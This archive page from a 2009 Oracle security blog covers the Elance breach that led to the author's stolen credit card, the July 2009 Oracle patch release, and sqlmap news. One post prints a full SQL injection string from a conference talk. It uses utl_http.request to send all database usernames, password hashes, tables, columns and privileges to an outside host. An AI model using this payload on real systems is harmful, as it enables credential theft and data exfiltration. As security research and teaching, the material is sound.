Archive for the ‘Security’ Category

Elance.com was hacked and my creditcard was stolen and abused

Montag, Juli 20th, 2009

This time I am writing this blog entry as a victim…

My data (including my creditcard number) was stolen from the website elance.com. 24 hours later my creditcard number as abused. Luckily the criminals did a test booking for approx. 1 USD (in a webshop in the US) and the fraud detection team from Mastercard immediately locked my creditcard.

Here the short history:

Last friday, 18 July 2009, I received an email from Elance.com:
We recently learned that certain Elance user information was accessed without authorization, including potentially yours. The data accessed was contact information — specifically name, email address, telephone number, city location and Elance login information (passwords were protected with encryption). This incident did NOT involve any credit card, bank account, social security or tax ID numbers.

We have remedied the cause of the breach and are working with appropriate authorities. We have also implemented additional security measures and have strengthened password requirements to protect all of our users.

We sincerely regret any inconvenience or disruption this may cause.

If you have any unanswered questions and for ongoing information about this matter, please visit this page in our Trust & Safety center: http://www.elance.com/p/trust/account_security.html

For information on re-setting your password, visit: http://help.elance.com/forums/30969/entries/47262

Thank you for your understanding,

Michael Culver
Vice President
Elance

I thought: „Good to know that this happened. My creditcard information is not affected.“
20. july – Monday morning:  I tried to buy some gasoline. This was not possible because my card was not accepted: „Errorcode 02“ . I payed with a different card and called the lufthansa mastercard service. They explained me that someone tried to buy something for 1 USD in Arizona and Mastercard has locked my card…

I will get a new creditcard within the next few days.

20. july – Noon: At home I read the email from elance again and I was really pissed off (passwords encrypted and not hashed) that they lied in the previous email. Send an email to elance.com (ticket#20836) and asked for details of this break-in. No answer so far…

will be continued….

Oracle CPU July 2009 published

Mittwoch, Juli 15th, 2009

Yesterday night Oracle released the July 2009 CPU. This CPU contains 30 fixes for several Oracle products. 10 security issues are fixed in the Oracle Database Server.As always the usual suspects (Esteban, David, Joxean, Alexandr, Dennis) and a few others reported issues in Oracle products.

The 3 most critical bugs this time are related to the TNS Listener and one of the bugs be exploited without authentication.These issues CVE-2009-1020, CVE-2009-1019, CVE-2009-1963 are rated with CVSS 9 (for Windows), 7.5 for Unix.
Oracle has also fixed 3 of my findings in the database (3 out of 10 :-))

  • SQL Injection in DBMS_EXPORT_EXTENSION (previously fixed in April 2006)
  • Information Disclosure (Password Hash) in Database Vault
  • Information Disclosure (Password Hash) in Audit Vault

More details will be published within the next few days. The updates for our Oracle database scanner Repscan (free trial available) will be released within the next 2 days.

Presentation from Confidence 2009 available

Samstag, Mai 16th, 2009

I just uploaded the presentation „SQL Injection in Oracle Webapps“ to our website. This presentation describes the basics of SQL, different exploitation techniques (inband, out-of-band, blind), how to search creditcard numbers in the database (using dbms_xmlgen), …Here is one of the sample SQL Injection strings from the presentation. With this  SQL Injection string we are getting all username/passwords, all table names, all column names and all privileges in one step. The trick is to use sum(length(utl_http())) in the SELECT clause.

http://victim.com/order.jsp?id=17‚ or 1=((select

sum(length(utl_http.request(‚http://www.orasploit.com/’||

username||’=’||password) from dba_users)))+((select

sum(utl_http.request(‚http://www. orasploit.com/’||

owner||’=’||table_name) from dba_tables))+((select

sum(length(utl_http.request(‚http://www.orasploit.com/’||

owner||’=’||table_name||’=’||column_name)) from dba_users))

+((select sum(length(utl_http.request(‚http://

www.orasploit.com/’||grantee||’=’||granted_role) from

dba_role_privs)))+((select

sum(length(utl_http.request(‚http://www.orasploit.com/’||

grantee||’=’||owner||’=’||table_name||’=’||privilege||’=’||

grantable) from dba_tab_privs)))–

SQLMap 0.7 rc is out

Donnerstag, April 23rd, 2009

Yesterday Bernardo Damele released sqlmap 0.7 rc1 for Linux. This new version of SQLMap was published at the Blackhat Europe and allows the execution of OS commands on SQL Server, MySQL and Postgres.

Oracle is not part of it but I am quite sure sooner or later the execution of Oracle commands will be supported as well…

The blackhat presentation „Advanced SQL injection to operating system full control“ is also available for download.

3 new Oracle Security Videos

Donnerstag, April 16th, 2009

I just uploaded 3 new Oracle security videos:

Trial version of Repscan available on the Sentrigo website.